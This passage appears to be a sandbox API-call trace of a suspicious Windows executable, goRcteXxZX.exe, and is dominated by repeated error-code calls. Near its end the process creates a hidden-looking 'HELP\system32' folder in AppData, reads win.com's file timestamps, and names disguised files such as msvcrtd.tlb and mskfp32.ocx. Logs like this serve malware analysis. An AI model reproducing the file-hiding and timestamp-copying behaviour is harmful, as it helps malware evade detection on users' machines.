¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0036.284] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x2ef3e4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@\x86Úõ\x1c÷.", lpUsedDefaultChar=0x0) returned 256 [0036.284] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.284] GetLastError () returned 0x0 [0036.284] SetLastError (dwErrCode=0x0) [0036.284] GetLastError () returned 0x0 [0036.284] SetLastError (dwErrCode=0x0) [0036.284] GetLastError () returned 0x0 [0036.284] SetLastError (dwErrCode=0x0) [0036.284] GetLastError () returned 0x0 [0036.284] SetLastError (dwErrCode=0x0) [0036.284] GetLastError () returned 0x0 [0036.284] SetLastError (dwErrCode=0x0) [0036.284] GetLastError () returned 0x0 [0036.284] SetLastError (dwErrCode=0x0) [0036.284] GetLastError () returned 0x0 [0036.284] SetLastError (dwErrCode=0x0) [0036.284] GetLastError () returned 0x0 [0036.513] SetLastError (dwErrCode=0x0) [0036.513] GetLastError () returned 0x0 [0036.513] SetLastError (dwErrCode=0x0) [0036.513] GetLastError () returned 0x0 [0036.513] SetLastError (dwErrCode=0x0) [0036.513] GetLastError () returned 0x0 [0036.513] SetLastError (dwErrCode=0x0) [0036.513] GetLastError () returned 0x0 [0036.513] SetLastError (dwErrCode=0x0) [0036.513] GetLastError () returned 0x0 [0036.513] SetLastError (dwErrCode=0x0) [0036.513] GetLastError () returned 0x0 [0036.513] SetLastError (dwErrCode=0x0) [0036.513] GetLastError () returned 0x0 [0036.513] SetLastError (dwErrCode=0x0) [0036.513] GetLastError () returned 0x0 [0036.513] SetLastError (dwErrCode=0x0) [0036.513] GetLastError () returned 0x0 [0036.513] SetLastError (dwErrCode=0x0) [0036.513] GetLastError () returned 0x0 [0036.513] SetLastError (dwErrCode=0x0) [0036.513] GetLastError () returned 0x0 [0036.513] SetLastError (dwErrCode=0x0) [0036.513] GetLastError () returned 0x0 [0036.513] SetLastError (dwErrCode=0x0) [0036.513] GetLastError () returned 0x0 [0036.514] SetLastError (dwErrCode=0x0) [0036.514] GetLastError () returned 0x0 [0036.514] SetLastError (dwErrCode=0x0) [0036.514] GetLastError () returned 0x0 [0036.514] SetLastError (dwErrCode=0x0) [0036.514] GetLastError () returned 0x0 [0036.514] SetLastError (dwErrCode=0x0) [0036.514] GetLastError () returned 0x0 [0036.514] SetLastError (dwErrCode=0x0) [0036.514] GetLastError () returned 0x0 [0036.514] SetLastError (dwErrCode=0x0) [0036.514] GetLastError () returned 0x0 [0036.514] SetLastError (dwErrCode=0x0) [0036.514] GetLastError () returned 0x0 [0036.514] SetLastError (dwErrCode=0x0) [0036.514] GetLastError () returned 0x0 [0036.514] SetLastError (dwErrCode=0x0) [0036.514] GetLastError () returned 0x0 [0036.514] SetLastError (dwErrCode=0x0) [0036.514] GetLastError () returned 0x0 [0036.514] SetLastError (dwErrCode=0x0) [0036.514] GetLastError () returned 0x0 [0036.514] SetLastError (dwErrCode=0x0) [0036.514] GetLastError () returned 0x0 [0036.514] SetLastError (dwErrCode=0x0) [0036.514] GetLastError () returned 0x0 [0036.514] SetLastError (dwErrCode=0x0) [0036.514] GetLastError () returned 0x0 [0036.514] SetLastError (dwErrCode=0x0) [0036.514] GetLastError () returned 0x0 [0036.514] SetLastError (dwErrCode=0x0) [0036.514] GetLastError () returned 0x0 [0036.515] SetLastError (dwErrCode=0x0) [0036.515] GetLastError () returned 0x0 [0036.515] SetLastError (dwErrCode=0x0) [0036.515] GetLastError () returned 0x0 [0036.515] SetLastError (dwErrCode=0x0) [0036.515] GetLastError () returned 0x0 [0036.515] SetLastError (dwErrCode=0x0) [0036.515] GetLastError () returned 0x0 [0036.515] SetLastError (dwErrCode=0x0) [0036.515] GetLastError () returned 0x0 [0036.515] SetLastError (dwErrCode=0x0) [0036.515] GetLastError () returned 0x0 [0036.515] SetLastError (dwErrCode=0x0) [0036.515] GetLastError () returned 0x0 [0036.515] SetLastError (dwErrCode=0x0) [0036.515] GetLastError () returned 0x0 [0036.515] SetLastError (dwErrCode=0x0) [0036.515] GetLastError () returned 0x0 [0036.515] SetLastError (dwErrCode=0x0) [0036.515] GetLastError () returned 0x0 [0036.515] SetLastError (dwErrCode=0x0) [0036.515] GetLastError () returned 0x0 [0036.515] SetLastError (dwErrCode=0x0) [0036.515] GetLastError () returned 0x0 [0036.515] SetLastError (dwErrCode=0x0) [0036.515] GetLastError () returned 0x0 [0036.515] SetLastError (dwErrCode=0x0) [0036.515] GetLastError () returned 0x0 [0036.515] SetLastError (dwErrCode=0x0) [0036.515] GetLastError () returned 0x0 [0036.515] SetLastError (dwErrCode=0x0) [0036.515] GetLastError () returned 0x0 [0036.516] SetLastError (dwErrCode=0x0) [0036.516] GetLastError () returned 0x0 [0036.516] SetLastError (dwErrCode=0x0) [0036.516] GetLastError () returned 0x0 [0036.516] SetLastError (dwErrCode=0x0) [0036.516] GetLastError () returned 0x0 [0036.516] SetLastError (dwErrCode=0x0) [0036.516] GetLastError () returned 0x0 [0036.516] SetLastError (dwErrCode=0x0) [0036.516] GetLastError () returned 0x0 [0036.516] SetLastError (dwErrCode=0x0) [0036.516] GetLastError () returned 0x0 [0036.516] SetLastError (dwErrCode=0x0) [0036.516] GetLastError () returned 0x0 [0036.516] SetLastError (dwErrCode=0x0) [0036.516] GetLastError () returned 0x0 [0036.516] SetLastError (dwErrCode=0x0) [0036.516] GetLastError () returned 0x0 [0036.516] SetLastError (dwErrCode=0x0) [0036.516] GetLastError () returned 0x0 [0036.516] SetLastError (dwErrCode=0x0) [0036.516] GetLastError () returned 0x0 [0036.516] SetLastError (dwErrCode=0x0) [0036.516] GetLastError () returned 0x0 [0036.516] SetLastError (dwErrCode=0x0) [0036.516] GetLastError () returned 0x0 [0036.516] SetLastError (dwErrCode=0x0) [0036.516] GetLastError () returned 0x0 [0036.516] SetLastError (dwErrCode=0x0) [0036.516] GetLastError () returned 0x0 [0036.517] SetLastError (dwErrCode=0x0) [0036.517] GetLastError () returned 0x0 [0036.517] SetLastError (dwErrCode=0x0) [0036.517] GetLastError () returned 0x0 [0036.517] SetLastError (dwErrCode=0x0) [0036.517] GetLastError () returned 0x0 [0036.517] SetLastError (dwErrCode=0x0) [0036.517] GetLastError () returned 0x0 [0036.517] SetLastError (dwErrCode=0x0) [0036.517] GetLastError () returned 0x0 [0036.517] SetLastError (dwErrCode=0x0) [0036.517] GetLastError () returned 0x0 [0036.517] SetLastError (dwErrCode=0x0) [0036.517] GetLastError () returned 0x0 [0036.517] SetLastError (dwErrCode=0x0) [0036.517] GetLastError () returned 0x0 [0036.517] SetLastError (dwErrCode=0x0) [0036.517] GetLastError () returned 0x0 [0036.517] SetLastError (dwErrCode=0x0) [0036.517] GetLastError () returned 0x0 [0036.517] SetLastError (dwErrCode=0x0) [0036.517] GetLastError () returned 0x0 [0036.517] SetLastError (dwErrCode=0x0) [0036.517] GetLastError () returned 0x0 [0036.517] SetLastError (dwErrCode=0x0) [0036.517] GetLastError () returned 0x0 [0036.517] SetLastError (dwErrCode=0x0) [0036.517] GetLastError () returned 0x0 [0036.517] SetLastError (dwErrCode=0x0) [0036.517] GetLastError () returned 0x0 [0036.517] SetLastError (dwErrCode=0x0) [0036.518] GetLastError () returned 0x0 [0036.518] SetLastError (dwErrCode=0x0) [0036.518] GetLastError () returned 0x0 [0036.518] SetLastError (dwErrCode=0x0) [0036.518] GetLastError () returned 0x0 [0036.518] SetLastError (dwErrCode=0x0) [0036.518] GetLastError () returned 0x0 [0036.518] SetLastError (dwErrCode=0x0) [0036.518] GetLastError () returned 0x0 [0036.518] SetLastError (dwErrCode=0x0) [0036.518] GetLastError () returned 0x0 [0036.518] SetLastError (dwErrCode=0x0) [0036.518] GetLastError () returned 0x0 [0036.518] SetLastError (dwErrCode=0x0) [0036.518] GetLastError () returned 0x0 [0036.518] SetLastError (dwErrCode=0x0) [0036.518] GetLastError () returned 0x0 [0036.518] SetLastError (dwErrCode=0x0) [0036.518] GetLastError () returned 0x0 [0036.518] SetLastError (dwErrCode=0x0) [0036.518] GetLastError () returned 0x0 [0036.518] SetLastError (dwErrCode=0x0) [0036.518] GetLastError () returned 0x0 [0036.518] SetLastError (dwErrCode=0x0) [0036.518] GetLastError () returned 0x0 [0036.518] SetLastError (dwErrCode=0x0) [0036.518] GetLastError () returned 0x0 [0036.518] SetLastError (dwErrCode=0x0) [0036.518] GetLastError () returned 0x0 [0036.518] SetLastError (dwErrCode=0x0) [0036.518] GetLastError () returned 0x0 [0036.518] SetLastError (dwErrCode=0x0) [0036.518] GetLastError () returned 0x0 [0036.519] SetLastError (dwErrCode=0x0) [0036.519] GetLastError () returned 0x0 [0036.519] SetLastError (dwErrCode=0x0) [0036.519] GetLastError () returned 0x0 [0036.519] SetLastError (dwErrCode=0x0) [0036.519] GetLastError () returned 0x0 [0036.519] SetLastError (dwErrCode=0x0) [0036.519] GetLastError () returned 0x0 [0036.519] SetLastError (dwErrCode=0x0) [0036.519] GetLastError () returned 0x0 [0036.519] SetLastError (dwErrCode=0x0) [0036.519] GetLastError () returned 0x0 [0036.519] SetLastError (dwErrCode=0x0) [0036.519] GetLastError () returned 0x0 [0036.519] SetLastError (dwErrCode=0x0) [0036.519] GetLastError () returned 0x0 [0036.519] SetLastError (dwErrCode=0x0) [0036.519] GetLastError () returned 0x0 [0036.519] SetLastError (dwErrCode=0x0) [0036.519] GetLastError () returned 0x0 [0036.519] SetLastError (dwErrCode=0x0) [0036.519] GetLastError () returned 0x0 [0036.519] SetLastError (dwErrCode=0x0) [0036.519] GetLastError () returned 0x0 [0036.519] SetLastError (dwErrCode=0x0) [0036.519] GetLastError () returned 0x0 [0036.519] SetLastError (dwErrCode=0x0) [0036.519] GetLastError () returned 0x0 [0036.519] SetLastError (dwErrCode=0x0) [0036.519] GetLastError () returned 0x0 [0036.520] SetLastError (dwErrCode=0x0) [0036.520] GetLastError () returned 0x0 [0036.520] SetLastError (dwErrCode=0x0) [0036.520] GetLastError () returned 0x0 [0036.520] SetLastError (dwErrCode=0x0) [0036.520] GetLastError () returned 0x0 [0036.520] SetLastError (dwErrCode=0x0) [0036.520] GetLastError () returned 0x0 [0036.520] SetLastError (dwErrCode=0x0) [0036.520] GetLastError () returned 0x0 [0036.520] SetLastError (dwErrCode=0x0) [0036.520] GetLastError () returned 0x0 [0036.520] SetLastError (dwErrCode=0x0) [0036.520] GetLastError () returned 0x0 [0036.520] SetLastError (dwErrCode=0x0) [0036.520] GetLastError () returned 0x0 [0036.520] SetLastError (dwErrCode=0x0) [0036.520] GetLastError () returned 0x0 [0036.520] SetLastError (dwErrCode=0x0) [0036.520] GetLastError () returned 0x0 [0036.520] SetLastError (dwErrCode=0x0) [0036.520] GetLastError () returned 0x0 [0036.520] SetLastError (dwErrCode=0x0) [0036.520] GetLastError () returned 0x0 [0036.520] SetLastError (dwErrCode=0x0) [0036.520] GetLastError () returned 0x0 [0036.520] SetLastError (dwErrCode=0x0) [0036.520] GetLastError () returned 0x0 [0036.520] SetLastError (dwErrCode=0x0) [0036.520] GetLastError () returned 0x0 [0036.520] SetLastError (dwErrCode=0x0) [0036.520] GetLastError () returned 0x0 [0036.520] SetLastError (dwErrCode=0x0) [0036.520] GetLastError () returned 0x0 [0036.521] SetLastError (dwErrCode=0x0) [0036.521] GetLastError () returned 0x0 [0036.521] SetLastError (dwErrCode=0x0) [0036.521] GetLastError () returned 0x0 [0036.521] SetLastError (dwErrCode=0x0) [0036.521] GetLastError () returned 0x0 [0036.521] SetLastError (dwErrCode=0x0) [0036.521] GetLastError () returned 0x0 [0036.521] SetLastError (dwErrCode=0x0) [0036.521] GetLastError () returned 0x0 [0036.521] SetLastError (dwErrCode=0x0) [0036.521] GetLastError () returned 0x0 [0036.521] SetLastError (dwErrCode=0x0) [0036.521] GetLastError () returned 0x0 [0036.521] SetLastError (dwErrCode=0x0) [0036.521] GetLastError () returned 0x0 [0036.521] SetLastError (dwErrCode=0x0) [0036.521] GetLastError () returned 0x0 [0036.521] SetLastError (dwErrCode=0x0) [0036.521] GetLastError () returned 0x0 [0036.521] SetLastError (dwErrCode=0x0) [0036.521] GetLastError () returned 0x0 [0036.521] SetLastError (dwErrCode=0x0) [0036.521] GetLastError () returned 0x0 [0036.521] SetLastError (dwErrCode=0x0) [0036.521] GetLastError () returned 0x0 [0036.521] SetLastError (dwErrCode=0x0) [0036.521] GetLastError () returned 0x0 [0036.521] SetLastError (dwErrCode=0x0) [0036.521] GetLastError () returned 0x0 [0036.521] SetLastError (dwErrCode=0x0) [0036.521] GetLastError () returned 0x0 [0036.521] SetLastError (dwErrCode=0x0) [0036.521] GetLastError () returned 0x0 [0036.522] SetLastError (dwErrCode=0x0) [0036.522] GetLastError () returned 0x0 [0036.522] SetLastError (dwErrCode=0x0) [0036.522] GetLastError () returned 0x0 [0036.522] SetLastError (dwErrCode=0x0) [0036.522] GetLastError () returned 0x0 [0036.522] SetLastError (dwErrCode=0x0) [0036.522] GetLastError () returned 0x0 [0036.522] SetLastError (dwErrCode=0x0) [0036.522] GetLastError () returned 0x0 [0036.522] SetLastError (dwErrCode=0x0) [0036.522] GetLastError () returned 0x0 [0036.522] SetLastError (dwErrCode=0x0) [0036.522] GetLastError () returned 0x0 [0036.522] SetLastError (dwErrCode=0x0) [0036.522] GetLastError () returned 0x0 [0036.522] SetLastError (dwErrCode=0x0) [0036.522] GetLastError () returned 0x0 [0036.522] SetLastError (dwErrCode=0x0) [0036.522] GetLastError () returned 0x0 [0036.522] SetLastError (dwErrCode=0x0) [0036.522] GetLastError () returned 0x0 [0036.522] SetLastError (dwErrCode=0x0) [0036.522] GetLastError () returned 0x0 [0036.522] SetLastError (dwErrCode=0x0) [0036.522] GetLastError () returned 0x0 [0036.522] SetLastError (dwErrCode=0x0) [0036.522] GetLastError () returned 0x0 [0036.522] SetLastError (dwErrCode=0x0) [0036.522] GetLastError () returned 0x0 [0036.522] SetLastError (dwErrCode=0x0) [0036.522] GetLastError () returned 0x0 [0036.522] SetLastError (dwErrCode=0x0) [0036.522] GetLastError () returned 0x0 [0036.523] SetLastError (dwErrCode=0x0) [0036.523] GetLastError () returned 0x0 [0036.523] SetLastError (dwErrCode=0x0) [0036.523] GetLastError () returned 0x0 [0036.523] SetLastError (dwErrCode=0x0) [0036.523] GetLastError () returned 0x0 [0036.523] SetLastError (dwErrCode=0x0) [0036.523] GetLastError () returned 0x0 [0036.523] SetLastError (dwErrCode=0x0) [0036.523] GetLastError () returned 0x0 [0036.523] SetLastError (dwErrCode=0x0) [0036.523] GetLastError () returned 0x0 [0036.523] SetLastError (dwErrCode=0x0) [0036.523] GetLastError () returned 0x0 [0036.523] SetLastError (dwErrCode=0x0) [0036.523] GetLastError () returned 0x0 [0036.523] SetLastError (dwErrCode=0x0) [0036.523] GetLastError () returned 0x0 [0036.523] SetLastError (dwErrCode=0x0) [0036.523] GetLastError () returned 0x0 [0036.523] SetLastError (dwErrCode=0x0) [0036.523] GetLastError () returned 0x0 [0036.523] SetLastError (dwErrCode=0x0) [0036.523] GetLastError () returned 0x0 [0036.523] SetLastError (dwErrCode=0x0) [0036.523] GetLastError () returned 0x0 [0036.523] SetLastError (dwErrCode=0x0) [0036.523] GetLastError () returned 0x0 [0036.523] SetLastError (dwErrCode=0x0) [0036.523] GetLastError () returned 0x0 [0036.523] SetLastError (dwErrCode=0x0) [0036.523] GetLastError () returned 0x0 [0036.524] SetLastError (dwErrCode=0x0) [0036.524] GetLastError () returned 0x0 [0036.524] SetLastError (dwErrCode=0x0) [0036.524] GetLastError () returned 0x0 [0036.524] SetLastError (dwErrCode=0x0) [0036.524] GetLastError () returned 0x0 [0036.524] SetLastError (dwErrCode=0x0) [0036.524] GetLastError () returned 0x0 [0036.524] SetLastError (dwErrCode=0x0) [0036.524] GetLastError () returned 0x0 [0036.524] SetLastError (dwErrCode=0x0) [0036.524] GetLastError () returned 0x0 [0036.524] SetLastError (dwErrCode=0x0) [0036.524] GetLastError () returned 0x0 [0036.524] SetLastError (dwErrCode=0x0) [0036.524] GetLastError () returned 0x0 [0036.524] SetLastError (dwErrCode=0x0) [0036.524] GetLastError () returned 0x0 [0036.524] SetLastError (dwErrCode=0x0) [0036.524] GetLastError () returned 0x0 [0036.524] SetLastError (dwErrCode=0x0) [0036.524] GetLastError () returned 0x0 [0036.524] SetLastError (dwErrCode=0x0) [0036.524] GetLastError () returned 0x0 [0036.524] SetLastError (dwErrCode=0x0) [0036.524] GetLastError () returned 0x0 [0036.524] SetLastError (dwErrCode=0x0) [0036.524] GetLastError () returned 0x0 [0036.524] SetLastError (dwErrCode=0x0) [0036.524] GetLastError () returned 0x0 [0036.524] SetLastError (dwErrCode=0x0) [0036.524] GetLastError () returned 0x0 [0036.524] SetLastError (dwErrCode=0x0) [0036.524] GetLastError () returned 0x0 [0036.525] SetLastError (dwErrCode=0x0) [0036.525] GetLastError () returned 0x0 [0036.525] SetLastError (dwErrCode=0x0) [0036.525] GetLastError () returned 0x0 [0036.525] SetLastError (dwErrCode=0x0) [0036.525] GetLastError () returned 0x0 [0036.525] SetLastError (dwErrCode=0x0) [0036.525] GetLastError () returned 0x0 [0036.525] SetLastError (dwErrCode=0x0) [0036.525] GetLastError () returned 0x0 [0036.525] SetLastError (dwErrCode=0x0) [0036.525] GetLastError () returned 0x0 [0036.525] SetLastError (dwErrCode=0x0) [0036.525] GetLastError () returned 0x0 [0036.525] SetLastError (dwErrCode=0x0) [0036.525] GetLastError () returned 0x0 [0036.525] SetLastError (dwErrCode=0x0) [0036.525] GetLastError () returned 0x0 [0036.525] SetLastError (dwErrCode=0x0) [0036.525] GetLastError () returned 0x0 [0036.525] SetLastError (dwErrCode=0x0) [0036.525] GetLastError () returned 0x0 [0036.525] SetLastError (dwErrCode=0x0) [0036.525] GetLastError () returned 0x0 [0036.525] SetLastError (dwErrCode=0x0) [0036.525] GetLastError () returned 0x0 [0036.525] SetLastError (dwErrCode=0x0) [0036.525] GetLastError () returned 0x0 [0036.525] SetLastError (dwErrCode=0x0) [0036.525] GetLastError () returned 0x0 [0036.525] SetLastError (dwErrCode=0x0) [0036.525] GetLastError () returned 0x0 [0036.525] SetLastError (dwErrCode=0x0) [0036.525] GetLastError () returned 0x0 [0036.526] SetLastError (dwErrCode=0x0) [0036.526] GetLastError () returned 0x0 [0036.526] SetLastError (dwErrCode=0x0) [0036.526] GetLastError () returned 0x0 [0036.526] SetLastError (dwErrCode=0x0) [0036.526] GetLastError () returned 0x0 [0036.526] SetLastError (dwErrCode=0x0) [0036.526] GetLastError () returned 0x0 [0036.526] SetLastError (dwErrCode=0x0) [0036.526] GetLastError () returned 0x0 [0036.526] SetLastError (dwErrCode=0x0) [0036.526] GetLastError () returned 0x0 [0036.526] SetLastError (dwErrCode=0x0) [0036.526] GetLastError () returned 0x0 [0036.526] SetLastError (dwErrCode=0x0) [0036.526] GetLastError () returned 0x0 [0036.526] SetLastError (dwErrCode=0x0) [0036.526] GetLastError () returned 0x0 [0036.526] SetLastError (dwErrCode=0x0) [0036.526] GetLastError () returned 0x0 [0036.526] SetLastError (dwErrCode=0x0) [0036.526] GetLastError () returned 0x0 [0036.526] SetLastError (dwErrCode=0x0) [0036.526] GetLastError () returned 0x0 [0036.526] SetLastError (dwErrCode=0x0) [0036.527] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0036.527] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0036.527] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0036.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef760 | out: lpSystemTimeAsFileTime=0x2ef760*(dwLowDateTime=0xe374fb50, dwHighDateTime=0x1d3dfba)) [0036.528] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2ef698, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.528] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2ef580, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.528] GetLastError () returned 0x0 [0036.528] GetLastError () returned 0x0 [0036.528] GetLastError () returned 0x0 [0036.528] GetLastError () returned 0x0 [0036.528] GetLastError () returned 0x0 [0036.528] GetLastError () returned 0x0 [0036.528] GetLastError () returned 0x0 [0036.528] GetLastError () returned 0x0 [0036.528] GetLastError () returned 0x0 [0036.528] GetLastError () returned 0x0 [0036.528] GetLastError () returned 0x0 [0036.528] GetLastError () returned 0x0 [0036.528] GetLastError () returned 0x0 [0036.528] GetLastError () returned 0x0 [0036.528] GetLastError () returned 0x0 [0036.528] GetLastError () returned 0x0 [0036.528] GetLastError () returned 0x0 [0036.528] GetLastError () returned 0x0 [0036.528] GetLastError () returned 0x0 [0036.529] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0036.529] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0036.529] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.529] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.529] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.529] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0036.529] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0036.529] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0036.529] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0036.529] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0036.529] GetLastError () returned 0xb7 [0036.529] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0036.529] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0036.529] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0036.529] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0036.529] wsprintfA (in: param_1=0x2ef400, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0036.529] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0036.529] wsprintfA (in: param_1=0x2ef2fc, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0036.529] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0036.530] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0036.530] CloseHandle (hObject=0x74) returned 1 [0036.530] GetLastError () returned 0x0 [0036.530] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0036.530] GetLastError () returned 0x0 [0036.530] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0036.530] GetSystemDirectoryA (in: lpBuffer=0x2ef400, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0036.530] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), 